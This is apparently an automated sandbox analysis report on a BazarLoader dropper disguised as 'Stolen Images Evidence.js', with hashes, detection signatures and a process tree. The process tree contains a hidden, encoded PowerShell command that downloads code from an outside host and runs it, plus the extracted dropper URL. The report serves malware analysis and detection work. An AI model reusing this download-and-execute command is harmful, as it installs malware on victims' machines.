Analysis
-
max time kernel
136s -
max time network
144s -
platform
windows7_x64 -
resource
win7-en-20210920 -
submitted
14-10-2021 18:11
Static task
static1
Behavioral task
behavioral1
Sample
Stolen Images Evidence.js
Resource
win7-en-20210920
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
Stolen Images Evidence.js
Resource
win10-en-20211014
windows10_x64
0 signatures
0 seconds
General
-
Target
Stolen Images Evidence.js
-
Size
19KB
-
MD5
c62b322046bee6a5a86c4fecf5dee72e
-
SHA1
18a381be8472fcee623c18cb1bfcf938682bef7d
-
SHA256
edb86c44b69eb1071a138ec2fd99968a18d671ecbcc6cbd7babcde7a132c1e01
-
SHA512
2d19000408a61cbf744defb51fc8f0c64f11c74186cdc2f56317641e16fd7c794919ead08ce119c62ec966dcd5a2c62794845e53f4697e657394c9e90ac1f0dc
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
http://bobersok.top/333g100/index.php
Signatures
-
Bazar Loader
Detected loader normally used to deploy BazarBackdoor malware.
-
Bazar/Team9 Loader payload 2 IoCs
resource yara_rule behavioral1/memory/1680-67-0x0000000000140000-0x0000000000168000-memory.dmp BazarLoaderVar6 behavioral1/memory/1904-69-0x0000000000230000-0x0000000000258000-memory.dmp BazarLoaderVar6 -
Blocklisted process makes network request 1 IoCs
flow pid Process 5 576 powershell.exe -
Loads dropped DLL 2 IoCs
pid Process 1680 regsvr32.exe 1904 rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 576 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 576 powershell.exe -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 1116 wrote to memory of 1372 1116 wscript.exe 27 PID 1116 wrote to memory of 1372 1116 wscript.exe 27 PID 1116 wrote to memory of 1372 1116 wscript.exe 27 PID 1372 wrote to memory of 576 1372 cmd.exe 29 PID 1372 wrote to memory of 576 1372 cmd.exe 29 PID 1372 wrote to memory of 576 1372 cmd.exe 29 PID 576 wrote to memory of 1680 576 powershell.exe 30 PID 576 wrote to memory of 1680 576 powershell.exe 30 PID 576 wrote to memory of 1680 576 powershell.exe 30 PID 576 wrote to memory of 1680 576 powershell.exe 30 PID 576 wrote to memory of 1680 576 powershell.exe 30
Processes
-
C:\Windows\system32\wscript.exewscript.exe "C:\Users\Admin\AppData\Local\Temp\Stolen Images Evidence.js"1⤵
- Suspicious use of WriteProcessMemory
PID:1116 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c POwersheLL -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYgBvAGIAZQByAHMAbwBrAC4AdABvAHAALwAzADMAMwBnADEAMAAwAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==2⤵
- Suspicious use of WriteProcessMemory
PID:1372 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePOwersheLL -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYgBvAGIAZQByAHMAbwBrAC4AdABvAHAALwAzADMAMwBnADEAMAAwAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:576 -
C:\Windows\System32\regsvr32.exe"C:\Windows\System32\regsvr32.exe" C:\Users\Admin\AppData\Local\Temp\FHbKnfj.dat4⤵
- Loads dropped DLL
PID:1680
-
-
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Users\Admin\AppData\Local\Temp\FHbKnfj.dat,DllRegisterServer {749609AF-8C93-44BA-A2BA-C66B158CBE86}1⤵
- Loads dropped DLL
PID:1904